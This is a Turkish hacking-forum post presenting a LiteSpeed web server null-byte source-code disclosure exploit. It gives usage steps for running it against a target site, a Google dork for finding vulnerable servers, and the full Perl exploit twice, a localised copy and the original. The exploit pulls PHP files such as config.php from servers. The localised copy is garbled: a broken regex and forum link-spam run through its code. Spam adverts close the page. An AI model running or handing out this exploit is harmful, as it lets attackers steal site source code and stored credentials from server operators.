Wardom ve Hackhell 'in Hacklenmesine Sebep olan Açık

4MinoRMacH1Né

Hard Work Beats Talent
Kayıtlı Üye
Açığın Orjinal ismi : Litespeed Technologies Web Server Remote Poison null byte Exploit
Açığın Türkçe ismi : Litespeed Web server Uzaktan Zehirleme
Açığı bulan kişi : Kingcope
Açığın Yaptığı: Açıklar Sadece Site scriptlerinde değil Bazende Sitelerin Bulunduğu Web Serverlarda oluyor Bu açık ile config.php ve index.php Gibi dosyaları bilgisayarımıza çekiyor yani bize .php 'yi download etme şansı veriyor
Web Server nedir: Web Server Bir Serverın Yayın Yonetmenidir. Web sunucusu ya da ağ sunucusu, İnternet üzerinde bir web sitesinin yayınından sorumlu olan sunucudur. HTTP başta olmak üzere HTTPS, FTP, SMTP, POP3, DNS ve hatta gerçek zamanlı veri akışı (streaming media) hizmeti veriyor olabili

Exploit Anlatımı : Exploiti Kullanabilmek için Bilgisayarınızda Perl Yüklü olmalıdır

Exploitin Windows işletim sisteminde kullanımı şu dur ;

lite.pl olarak kaydedin Exploiti ve C:/Perl/bin Klasörüne atın
sonra Başlat > çalıştır > CMD yazıp enterlayın

gelen MS-DOS ekranına

cd.. komutu verin bu işlemi C:/ dizinine inene kadar Tekrarlayın
C:> < bunu görünce cd Perl/bin yazip enterlayın daha sonrasindan PHP- Kodu:
perl lite.pl www.hedefsite.com index.php

yazip
entera basin eğer açık varsa exploit PHP- Kodu:
www.hedefsite.com-index.php

Perl Kodu :
#!/usr/bin/perl
#
#Litespeed Uzaktan Zehirleme
#Bulan Kingcope
#Google Araması: ""Proudly Served by LiteSpeed Web Server""
#Türkçeleştirme: Madconfig ~ Wordlhackerz.com
#Haziran 2010
#Fikri verdigi içi Teşekkürler > Üye Olmayanlar Forumumuzdaki Linkleri Göremez. 10 saniyenizi ayırarak üye olun...]


use IO::Socket;
use strict;

sub getphpsrc {
my $host = shift;
my $file = shift;

if (substr($file, 0, 1) eq "/") {
$file = substr($file, 1);
}
my $file2 = $file;
$file2 =~ s///_/g;
print "Kodlar kaydedildi $file > $host-$file2\n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => '80',
Proto => 'tcp') || die("Baglanti saglanamadi $ARGV[0]");

print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection:
close\r\n\r\n";

my $buf = "";

my $lpfound = 0;
my $saveme = 0;
my $savveme = 0;
while(<$sock>) {
if ($_ =~ /LiteSpeed/) {
$lpfound = 1;
}

if ($saveme == 2) {
$savveme = 1;
}

if ($saveme != 0 && $savveme == 0) {
$saveme++;
}

if ($_ =~ /Content-Length:/) {
$saveme = 1;
}

if ($savveme == 1) {
$buf .= $_;
}
}

if ($lpfound == 0) {
print "Litespeed Server olmaya bilir yinede acik Dosya kaydedildi.\n";
}

open FILE, ">$host-$file2";
print FILE $buf;
close FILE;
print "Tamamlandi.\n";
}

print "Litespeed Uzaktan Zehirleme\n";
print "Acıgı Bulan Kingcope\n";
print "Turkcelestirme Madconfig ~ www.worldhackerz.com\n";
print " Haziran 2010\n\n";

if ($#ARGV != 1) {
print "Kullanımı: perl lite.pl <domain/ip> <php dosyasi>\n";
print "Ornek: perl lite.pl Üye Olmayanlar Forumumuzdaki Linkleri Göremez. 10 saniyenizi ayırarak üye olun...] index.php\n";
????: Worldhackerz.com ~ Hack Team // Hacking Akademi Üye Olmayanlar Forumumuzdaki Linkleri Göremez. 10 saniyenizi ayırarak üye olun...]
exit(0);
}

getphpsrc($ARGV[0], $ARGV[1]);

print "İşlem Tamamlandı ~ Türkçeleştirme madconfig :>.\n";
 
---> Wardom ve Hackhell 'in Hacklenmesine Sebep olan Açık

buda Orjinal hâli ;


#!/usr/bin/perl

#

#LiteSpeed Technologies Web Server Remote Source Code Disclosure Justic3

#By Kingcope

#Google search: ""Proudly Served by LiteSpeed Web Server""

#Justic3.Org ~ Group

#Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556

#



use IO::Socket;

use strict;



sub getphpsrc {

my $host = shift;

my $file = shift;



if (substr($file, 0, 1) eq "/") {

$file = substr($file, 1);

}

my $file2 = $file;

$file2 =~ s/\//_/g;

print "Saving source code of $file into $host-$file2\n";



my $sock = IO::Socket::INET->new(PeerAddr => $host,

PeerPort => '80',

Proto => 'tcp') || die("Could not connect

to $ARGV[0]");



print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection:

close\r\n\r\n";



my $buf = "";



my $lpfound = 0;

my $saveme = 0;

my $savveme = 0;

while(<$sock>) {

if ($_ =~ /LiteSpeed/) {

$lpfound = 1;

}



if ($saveme == 2) {

$savveme = 1;

}



if ($saveme != 0 && $savveme == 0) {

$saveme++;

}



if ($_ =~ /Content-Length:/) {

$saveme = 1;

}



if ($savveme == 1) {

$buf .= $_;

}

}



if ($lpfound == 0) {

print "This does not seem to be a LiteSpeed Webserver, saving file anyways.\n";

}



open FILE, ">$host-$file2";

print FILE $buf;

close FILE;

print "Completed.\n";

}



print "LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit\n";

print "By Kingcope\n";

print "June 2010\n\n";



if ($#ARGV != 1) {

print "Usage: perl litespeed.pl \n";

print "Example: perl litespeed.pl www.thedomain.com index.php\n";

exit(0);

}



getphpsrc($ARGV[0], $ARGV[1]);



print "Operation Completed :>.\n";
 
bayigram takipçi satın al instagram beğeni satın al instagram takipçi satın al tiktok takipçi satın al Buy Followers haber
vozol puff
Geri
Üst